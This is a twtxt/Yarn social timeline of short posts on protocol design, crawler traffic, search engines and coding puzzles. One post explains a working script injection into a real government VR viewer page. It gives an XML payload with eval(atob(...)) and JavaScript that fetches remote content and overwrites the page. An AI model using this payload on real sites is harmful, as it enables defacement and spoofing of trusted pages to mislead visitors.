yarn

twtxt.andros.dev

↳ In-reply-to » What does the #twtxt community think about having a p2p database to store all history? This will be managed by Registries.

@prologic@twtxt.net If it develops, and I’m not saying it will happen soon, perhaps Yarn could be connected as an additional node. Implementation would not be difficult for any client or software. It will not only be a backup of twtxt, but it will be the source for search, discovery and network health.


osnews

feeds.twtxt.net

Thu, Mar 6 10:00AM (51w ago)

Google, DuckDuckGo massively expand “AI” search results
Clearly, online search isn’t bad enough yet, so Google is intensifying its efforts to continue speedrunning the downfall of Google Search. They’ve announced they’re going to show even more “AI”-generated answers in Search results, to more people. Today, we’re sharing that we’ve launched Gemini 2.0 for AI Overviews in the U.S. to help with harder questions, starting with coding, advanced math and multimodal queries, with mor … ⌘ Read more


eapl.me

Mon, Mar 3 10:28AM 2025 (1y ago)

↳ In-reply-to » @eapl.me There are several points that I like, but I want to highlight number 7. https://text.eapl.mx/a-few-ideas-for-a-next-twtxt-version #twtxt

looks good to me!

About alice’s hash, using SHA256, I get 96473b4f or 96473B4F for the last 8 characters. I’ll add it as an implementation example.
The idea of including it alongside the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly); it also helps track replies across the file with a simple search.

Also, looking at your example, I now think that instead of {url=96473B4F,id=1}, which is ambiguous about which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1.
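
A minimal sketch of the scheme described above, assuming the hash is the SHA-256 of the feed URL encoded as UTF-8 (the post does not say exactly which string is hashed). The feed URL below is hypothetical, and the function names are only for illustration.

```python
import hashlib


def url_hash(feed_url: str) -> str:
    """Return the last 8 hex characters of the SHA-256 digest, uppercased."""
    digest = hashlib.sha256(feed_url.encode("utf-8")).hexdigest()
    return digest[-8:].upper()


def full_twt_id(feed_url: str, twt_id: int) -> str:
    """Build the 'full twt ID' in the proposed [URL_HASH]_[TWT_ID] form."""
    return f"{url_hash(feed_url)}_{twt_id}"


def reply_tag(feed_url: str, twt_id: int) -> str:
    """Build the proposed {reply_to=...} marker for a reply."""
    return "{reply_to=" + full_twt_id(feed_url, twt_id) + "}"


# Hypothetical feed URL, used only to show the shape of the result.
example_url = "https://example.com/alice/twtxt.txt"
print(reply_tag(example_url, 1))
```

Storing the hash next to the follow URL, as suggested, would let a client skip the `url_hash` call entirely and find replies with a plain text search for the ID.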


lyse

lyse.isobeef.org

Sat, Feb 15 2:30AM 2025 (1y ago)

↳ In-reply-to » @lyse Where? 🧐

@prologic@twtxt.net Of course you don’t notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley’s message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]…” in it. This text in square brackets is repeated numerous times. If you search his feed for a closing square bracket followed by an opening square bracket (][) you will find a bunch more of these. It goes without saying that he never typed that in his feed. My client saves each twt hash I’ve explicitly marked read. A few days ago, I got plenty of apparently years-old, yet suddenly unread messages. Each and every single one of them contained this repeated bracketed text thing. The only conclusion is that something messed up the feed again.
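
The search described above can be sketched in a few lines. This is only an illustration: the sample feed text is made up (apart from the timestamp mentioned in the post), and a real check would read the downloaded feed file instead.

```python
def lines_with_repeated_brackets(feed_text: str) -> list[str]:
    """Return every feed line containing a ']' directly followed by '['."""
    return [line for line in feed_text.splitlines() if "][" in line]


# Hypothetical feed content; only the first timestamp comes from the post.
sample_feed = (
    "2023-01-09T22:42:37Z\t[Scheduled][Scheduled][Scheduled] some text\n"
    "2023-01-10T08:00:00Z\tAn ordinary twt without the artifact\n"
)

for line in lines_with_repeated_brackets(sample_feed):
    print(line)
```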


lyse

lyse.isobeef.org

Thu, Feb 13 12:30PM 2025 (1y ago)

↳ In-reply-to » @lyse Where? 🧐

@prologic@twtxt.net @xuu@txt.sour.is There:

Just search for ][ in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.


bmallred

staystrong.run

Wed, Feb 12 9:37AM 2025 (1y ago)

reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

(810) bingbot
(641) Googlebot
(624) http://www.google.com/bot.html
(545) DotBot
(290) GPTBot
(106) SemrushBot
(84) AhrefsBot
(62) MJ12bot
(60) BLEXBot
(55) wpbot
(37) Amazonbot
(28) YandexBot
(22) ClaudeBot
(19) AwarioBot
(14) https://domainsbot.com/pandalytics
(9) https://serpstatbot.com
(6) t3versionsBot
(6) archive.org_bot
(6) Applebot
(5) http://search.msn.com/msnbot.htm
(4) http://www.googlebot.com/bot.html
(4) Googlebot-Mobile
(4) DuckDuckGo-Favicons-Bot
(3) https://turnitin.com/robot/crawlerinfo.html
(3) YandexNews
(3) ImagesiftBot
(2) Qwantify-prod
(1) http://www.google.com/adsbot.html
(1) http://gais.cs.ccu.edu.tw/robot.php
(1) YaK
(1) WBSearchBot
(1) DataForSeoBot

i have placed some middleware to reject these for now but it is not a foolproof solution.
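
A rough sketch of how such a tally and a reject check could look, assuming bots are identified by a case-insensitive substring match on the User-Agent header. The marker list is a subset of the names above, the sample User-Agent strings are hypothetical, and this is not the actual middleware.

```python
from collections import Counter

# Subset of the crawler names from the list above (assumption: substring match).
BOT_MARKERS = ("bingbot", "Googlebot", "DotBot", "GPTBot", "ClaudeBot")


def match_bot(user_agent: str):
    """Return the first marker found in the User-Agent, or None."""
    ua = user_agent.lower()
    for marker in BOT_MARKERS:
        if marker.lower() in ua:
            return marker
    return None


def tally(user_agents):
    """Count requests per matched bot marker."""
    return Counter(m for m in map(match_bot, user_agents) if m is not None)


def should_reject(user_agent: str) -> bool:
    """Middleware-style check: reject any request from a listed bot."""
    return match_bot(user_agent) is not None


# Hypothetical User-Agent values as they might appear in an access log.
sample = [
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; GPTBot/1.0)",
    "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
]

for name, count in tally(sample).most_common():
    print(f"({count}) {name}")
```

Since the User-Agent header is self-reported, a check like this only stops bots that identify themselves honestly, which is one reason it cannot be foolproof.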


lyse

lyse.isobeef.org

Fri, Feb 7 6:15PM 2025 (1y ago)

↳ In-reply-to » (#bhpz3uq) They fixed it. :-D https://www.youtube.com/watch?v=A8b7HFUXPqk

Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.


johanbove

johanbove.info

Wed, Jan 29 3:49PM 2025 (1y ago)

Reading “Man’s search for meaning” by Viktor E. Frankl


xkcd-com

feeds.twtxt.net

Tue, Jan 21 7:00PM 2025 (1y ago)

Unit Circle
⌘ Read more


aelaraji

aelaraji.com

Sun, Jan 19 7:49PM 2025 (1y ago)

↳ In-reply-to » Google Begins Requiring JavaScript For Google Search Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to "better protect" Google Search against malicious activity, such as bots and spam, and to improve the over ... ⌘ Read more

@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘


osnews

feeds.twtxt.net

Sat, Jan 18 3:27PM 2025 (1y ago)

Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more


slashdot

feeds.twtxt.net

Fri, Jan 17 12:50PM 2025 (1y ago)

Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the over … ⌘ Read more


xuu

txt.sour.is

Tue, Jan 14 11:14PM 2025 (1y ago)

↳ In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by injecting unrestricted JavaScript that gets autoloaded by the KRPano VR media viewer.
The xml parameter holds a URL whose content is the following:

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

The omitted part above is the base64-encoded script below:

const queryParams = new URLSearchParams(window.location.search),
      id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
    .then(e => e.text())
    .then(e => {
        document.open(), document.write(e), document.close();
    })
    .catch(e => {
        console.error('Error fetching the user agent:', e);
    }) : console.error('No');

This script fetches the text at the URL https://sour.is/superhax.txt and replaces the document content with it.


prologic

twtxt.net

Tue, Jan 14 5:06PM 2025 (1y ago)

↳ In-reply-to » @prologic uhhh what happened to search.twtxt.net

@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can’t afford to run the search engine right now on the remaining two nodes 😢😢


lime360

lime360.nekoweb.org

Tue, Jan 14 12:44PM 2025 (1y ago)

@prologic@twtxt.net uhhh what happened to search.twtxt.net


eapl.me

Mon, Jan 6 1:24PM 2025 (1y ago)

↳ In-reply-to » @eapl.me And here I always lived by:

nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn’t find anything related when I searched for it.


falsifian

www.falsifian.org

Sat, Jan 4 12:27PM 2025 (1y ago)

@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.


andros

twtxt.andros.dev

Thu, Jan 2 12:12PM 2025 (1y ago)

@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, a search API?


doesnm

doesnm.p.psf.lt

Sat, Dec 28 2:40AM 2024 (1y ago)

I remembered one ISP that disallows IRC stuff on its servers. By searching, I found that many ISPs equate IRC with proxies and doorways. This is unfair!


lime360

lime360.nekoweb.org

Thu, Dec 12 10:18AM 2024 (1y ago)

clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi


aelaraji

aelaraji.com

Thu, Nov 28 10:40PM 2024 (1y ago)

↳ In-reply-to » Behold ... "Marginalia" ! My new favorite search engine!! And I have @mattof to thank for this find. Here's their Blog post about it since I don't think I could do a better job describing what it is. but, tl;dr: it's a #smallweb focused search engine.

… it even shows @sorenpeter@darch.dk’s article from 2020 in search results


aelaraji

aelaraji.com

Tue, Nov 26 7:21PM 2024 (1y ago)

↳ In-reply-to » Behold ... "Marginalia" ! My new favorite search engine!! And I have @mattof to thank for this find. Here's their Blog post about it since I don't think I could do a better job describing what it is. but, tl;dr: it's a #smallweb focused search engine.

@prologic@twtxt.net I cannot… believe… It took me a “Single Search Query” to get HOOKED!! 🤩 Bonus: tried it from terminal too and it works just 👌


aelaraji

aelaraji.com

Tue, Nov 26 4:00PM 2024 (1y ago)

Behold … “Marginalia” ! My new favorite search engine!! And I have @mattof to thank for this find. Here’s their Blog post about it since I don’t think I could do a better job describing what it is. but, tl;dr: it’s a #smallweb focused search engine.


prologic

twtxt.net

Wed, Nov 13 8:53PM 2024 (1y ago)

The web is such garbage these days 😔 Or is it the garbage search engines? 🤔


johanbove

johanbove.info

Mon, Nov 4 8:06AM 2024 (1y ago)

↳ In-reply-to » Wouldn't you rather have work and private separated? Any thought behind this decision? I like tags, like Gmail does it. I still think mail needs a big rethink. It's too prominent in life, to be this archaic.

@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldi’s labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.


johanbove

johanbove.info

Thu, Oct 31 8:20AM 2024 (1y ago)

So I’ve flattened my work and private email inboxes to single inbox folders and I don’t even know anymore what I was thinking before trying frantically to organise everything in sub folders. Labels and search filters are the way forward.


xuu

txt.sour.is

Thu, Oct 3 12:37AM 2024 (1y ago)

↳ In-reply-to » @prologic I wanted to wait for things to settle down. It’s still unclear to me in which direction we’re going – and if that new/different stuff is even possible to implement in jenny. That said, I’ve been really busy with private stuff these last few days, I’ve lost track of most of what you’re discussing. 🥴

I swear I did write up an algorithm for it at some point; I think it is lost in a git comment someplace. I’ll put together some pseudo/Go code this week.

Super simple:

Making a reply:

If yarn has one use that. (Maybe do collision check?)
Make hash of twt raw no truncation.
Check local cache for shortest without collision
- in SQL: select len(subject) where head_full_hash like subject || '%'

Threading:

Get full hash of head twt
Search for twts
- in SQL: head_full_hash like subject || '%' and created_on > head_timestamp

The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.
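
The two steps above can be sketched as follows. This is an illustration in Python rather than the promised Go code; the function names, the in-memory list standing in for the local cache, and the `min_len` default are all assumptions not stated in the post.

```python
from datetime import datetime


def shortest_unique_prefix(full_hash, known_hashes, min_len=1):
    """Shortest prefix of full_hash that no other cached full hash shares."""
    others = [h for h in known_hashes if h != full_hash]
    for n in range(min_len, len(full_hash) + 1):
        prefix = full_hash[:n]
        if not any(h.startswith(prefix) for h in others):
            return prefix
    return full_hash  # no shorter unique prefix exists


def find_replies(head_full_hash, head_timestamp, twts):
    """Mirror of: head_full_hash like subject || '%' and created_on > head_timestamp.

    twts is an iterable of (subject, created_on, text) tuples.
    """
    return [
        t for t in twts
        if t[0] and head_full_hash.startswith(t[0]) and t[1] > head_timestamp
    ]


# Hypothetical cache contents and twts.
cache = ["abcdef123", "abcxyz999"]
head = "abcdef123"
subject = shortest_unique_prefix(head, cache)
print(subject)

head_time = datetime(2024, 10, 1, 12, 0)
twts = [
    (subject, datetime(2024, 10, 2, 9, 0), "a reply to the head"),
    (subject, datetime(2024, 9, 30, 9, 0), "older twt, same prefix"),
    ("abcx", datetime(2024, 10, 2, 9, 0), "reply to a different head"),
]
for reply in find_replies(head, head_time, twts):
    print(reply[2])
```

The timestamp filter is what makes a short prefix workable: a twt older than the head cannot be a reply to it, so it is dropped even when the prefix matches.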


falsifian

www.falsifian.org

Fri, Sep 27 9:44PM 2024 (1y ago)

Diving into mblaze, I think I’ve nearly* reached peak email geek.

Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).

EXAMPLES at https://git.vuxu.org/mblaze/tree/README

So far I’m using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.

*To get any closer, I think I’d have to hand-craft my own SMTP client or something.


falsifian

www.falsifian.org

Mon, Sep 23 11:54AM 2024 (1y ago)

↳ In-reply-to » #fzf is the new emacs: a tool with a simple purpose that has evolved to include an #email client. https://sr.ht/~rakoo/omail/

@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.


prologic

twtxt.net

Sun, Sep 22 4:50AM 2024 (1y ago)

So I’m a location based system, how exactly do I reply to one of these two Twts from @Yarns@search.twtxt.net ? 🤔

2024-09-07T12:55:56Z	🥳 NEW FEED: @<twtxt http://edsu.github.io/twtxt/twtxt.txt>
2024-09-07T12:55:56Z	🥳 NEW FEED: @<kdy https://twtxt.kdy.ch/twtxt.txt>


david

collantes.us

Fri, Sep 20 1:05PM 2024 (1y ago)

↳ In-reply-to » @prologic Do you have a link to some past discussion?

@falsifian@www.falsifian.org comments on the feeds as in nick, url, follow, that kind of thing? If that, then not interested at all. I envision an archive that would allow searching, and potentially browsing threads on a nice, neat interface. You will have to think, though, about other things. Like, what to do with images? Yarn allows users to upload images, but also embed them in twtxts from other sources (hotlinking, actually).


falsifian

www.falsifian.org

Wed, Sep 4 11:50PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I don’t know how things work out in practice, but just based on reading, I don’t see why it can’t be an API for a crawling search engine. (In fact I don’t see anything in the spec indicating registry servers shouldn’t crawl.)

(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends “The registries should sync each others user list by using the users endpoint”. If I understood that right, registering with one should be enough to appear on others, even if they don’t crawl.)

Does yarnd provide an API for finding twts? Is it similar?


falsifian

www.falsifian.org

Wed, Sep 4 9:55PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?


falsifian

www.falsifian.org

Wed, Sep 4 9:22PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net What’s the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?
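
For context, a hedged sketch of what querying that endpoint could look like from a client. Only the /api/plain/tweets path comes from the post; the `q` query parameter and the tab-separated nick, URL, timestamp, text response layout are recalled from the registry documentation and should be treated as assumptions, and the registry host and sample line are hypothetical.

```python
from urllib.parse import urlencode


def tweets_search_url(registry_base: str, query: str) -> str:
    """Build a search URL for a registry's plain-text tweets endpoint."""
    base = registry_base.rstrip("/")
    return f"{base}/api/plain/tweets?{urlencode({'q': query})}"


def parse_registry_line(line: str) -> dict:
    """Split one response line into its four assumed tab-separated fields."""
    nick, url, timestamp, text = line.rstrip("\n").split("\t", 3)
    return {"nick": nick, "url": url, "timestamp": timestamp, "text": text}


# Hypothetical registry host and response line.
print(tweets_search_url("https://registry.example/", "hello world"))
sample_line = "alice\thttps://example.com/twtxt.txt\t2024-09-04T21:22:00Z\thello world"
print(parse_registry_line(sample_line))
```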


quark

ferengi.one

Sun, Aug 25 5:45PM 2024 (1y ago)

↳ In-reply-to » @movq is there a way to purge twtxts from a feed I no longer follow?

Never mind, I simply searched and deleted them all (D then ~f sender). :-) Phew!


aelaraji

aelaraji.com

Fri, Aug 23 8:34PM 2024 (1y ago)

↳ In-reply-to » 🥳 NEW FEED: @aelaraji

@Yarns@search.twtxt.net An oopsie? 🥳😂


sorenpeter

darch.dk

Sat, Jun 29 2:14PM 2024 (1y ago)

↳ In-reply-to » Can anyone recommend and/or vouch for a Chrome/browser extension that lets me write rewrite rules for arbitrary links on a page? e.g: s/(www\.)?youtube.com\/watch?v=([^?]+)/tubeproxy.mills.io/play/\1 for example? 🤔

Have not tried any of them, but some of these seem to fit the bill:


aelaraji

aelaraji.com

Thu, May 23 3:27PM 2024 (1y ago)

↳ In-reply-to » QOTD: Which web search engine do you use? 😂

@movq@www.uninformativ.de I’ve been using Qwant for a while but it was down earlier today (as well 😆) so I switched back to my trusty Searx Redirector

… This utility forwards your search query to one of 11 random volunteer-run public servers to thwart mass surveillance.


movq

www.uninformativ.de

Thu, May 23 3:07PM 2024 (1y ago)

QOTD: Which web search engine do you use? 😂


prologic

twtxt.net

Sat, Apr 27 11:58PM 2024 (1y ago)

Hah 🤣 @dfaria@twtxt.net Your @dfaria.eu@dfaria.eu feed really does consume >50% of a “Discover” search with filters “Without replies” and “Hide my posts”. 🤣 36/2 = 18 out of 25 Twts per page, that’s ~72% of the search/view real estate you’re taking up! wow 🤩 – I’d be very interested to hear what ideas you have to improve this? Those search filters were created so you could sift through either your own Timeline or the Discover view easily.


sorenpeter

darch.dk

Fri, Apr 5 4:58PM 2024 (1y ago)

Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.eu🙏

Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt


prx

si3t.ch

Fri, Mar 1 12:08PM 2024 (2y ago)

You come across such things… Here, lots of books in plain-text format: https://github.com/ganesh-k13/shell/tree/master/test_search/www.glozman.com/TextPages


slashdot

feeds.twtxt.net

Tue, Jan 23 1:00PM 2024 (2y ago)

Google Chrome Gains AI Features Including a Writing Helper
Google is adding new AI features to Chrome, including tools to organize browser tabs, customize themes, and assist users with writing online content such as reviews and forum posts.

The writing helper is similar to an AI-powered feature already offered in Google’s experimental search experience, SGE, which helps users draft emails in various tones and lengths. W … ⌘ Read more


xuu

txt.sour.is

Tue, Jan 9 3:59PM 2024 (2y ago)

↳ In-reply-to » man... day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.

So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)

I implemented a Fibonacci Heap to replace the priority queue to great success.

https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268


xuu

txt.sour.is

Tue, Jan 2 10:58PM 2024 (2y ago)

↳ In-reply-to » @xuu That was one of the horror puzzles where I had to look for help. 🥴 I modelled my solution after this: https://www.youtube.com/watch?v=2pDSooPLLkI (I can’t explain it better than the video anyway.) It takes a second on my machine and that’s with my own hashmap implementation which is probably not the fastest one.

OH MY FREAKING HECK. So.. I made my pather able to run as Dijkstra or A* if the interface includes a heuristic.. when i tried without the heuristic it finished faster :|

So now to figure out why it’s not working right.
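
To illustrate the idea of one pather serving both roles, here is a small sketch in Python (not the Go code from the linked repository). With no heuristic it behaves as Dijkstra; with one it behaves as A*. The grid, the neighbour function and the Manhattan heuristic are made up for the example, and the sketch does not try to diagnose the slowdown described above.

```python
import heapq


def find_path_cost(start, goal, neighbors, heuristic=None):
    """Cheapest cost from start to goal; Dijkstra when heuristic is None, else A*."""
    h = heuristic or (lambda node: 0)
    best = {start: 0}
    frontier = [(h(start), 0, start)]  # (priority, cost so far, node)
    while frontier:
        _, cost, node = heapq.heappop(frontier)
        if node == goal:
            return cost
        if cost > best.get(node, float("inf")):
            continue  # stale queue entry, a cheaper route was already found
        for nxt, step in neighbors(node):
            new_cost = cost + step
            if new_cost < best.get(nxt, float("inf")):
                best[nxt] = new_cost
                heapq.heappush(frontier, (new_cost + h(nxt), new_cost, nxt))
    return None


# Hypothetical grid: each value is the cost of entering that cell.
GRID = [
    [1, 9, 1],
    [1, 9, 1],
    [1, 1, 1],
]
START, GOAL = (0, 0), (0, 2)


def grid_neighbors(node):
    r, c = node
    for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        nr, nc = r + dr, c + dc
        if 0 <= nr < len(GRID) and 0 <= nc < len(GRID[0]):
            yield (nr, nc), GRID[nr][nc]


def manhattan(node):
    # Never overestimates here because every step costs at least 1.
    return abs(node[0] - GOAL[0]) + abs(node[1] - GOAL[1])


print(find_path_cost(START, GOAL, grid_neighbors))             # Dijkstra
print(find_path_cost(START, GOAL, grid_neighbors, manhattan))  # A*
```

Both calls should agree on the cost as long as the heuristic never overestimates the remaining distance; a heuristic that overestimates can make A* return a wrong answer.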


xuu

txt.sour.is

Mon, Jan 1 12:03PM 2024 (2y ago)

man… day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.

Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go
A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go

some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesn’t give me the right answer

